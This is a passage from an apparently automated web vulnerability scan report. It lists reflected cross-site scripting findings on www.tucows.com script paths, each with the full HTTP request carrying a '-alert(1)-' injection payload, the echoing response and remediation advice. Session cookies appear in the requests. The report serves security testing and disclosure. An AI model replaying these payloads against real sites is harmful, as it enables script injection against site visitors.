url = "http://www.tucows.com/images/newassets/includes/js22c99"-alert(1)-"55fa4663456/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.263. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c02"-alert(1)-"c3378b8f5df was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/aalib.js51c02"-alert(1)-"c3378b8f5df HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/aalib.js51c02"-alert(1)-"c3378b8f5df";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.264. http://www.tucows.com/images/newassets/includes/js/aalib.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85680"-alert(1)-"13364046c33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/aalib.js?85680"-alert(1)-"13364046c33=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/aalib.js?85680"-alert(1)-"13364046c33=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.265. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1638"-alert(1)-"93eb7715e1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagese1638"-alert(1)-"93eb7715e1d/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagese1638"-alert(1)-"93eb7715e1d/newassets/includes/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.266. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94b97"-alert(1)-"7385601d3b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets94b97"-alert(1)-"7385601d3b4/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets94b97"-alert(1)-"7385601d3b4/includes/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.267. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5955"-alert(1)-"19d51f958d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesc5955"-alert(1)-"19d51f958d8/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesc5955"-alert(1)-"19d51f958d8/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.268. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0d6e"-alert(1)-"900705e6011 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/jsf0d6e"-alert(1)-"900705e6011/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/jsf0d6e"-alert(1)-"900705e6011/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.269. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72931"-alert(1)-"45543eb08c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/ajaxlib.js72931"-alert(1)-"45543eb08c1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/ajaxlib.js72931"-alert(1)-"45543eb08c1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.270. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4c98"-alert(1)-"3068e25c5c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/ajaxlib.js?d4c98"-alert(1)-"3068e25c5c8=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/ajaxlib.js?d4c98"-alert(1)-"3068e25c5c8=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.271. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca30"-alert(1)-"22e394819af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesfca30"-alert(1)-"22e394819af/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesfca30"-alert(1)-"22e394819af/newassets/includes/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.272. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a833"-alert(1)-"f1b3a80e89c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets5a833"-alert(1)-"f1b3a80e89c/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets5a833"-alert(1)-"f1b3a80e89c/includes/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.273. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be914"-alert(1)-"d7583b93b1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesbe914"-alert(1)-"d7583b93b1f/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
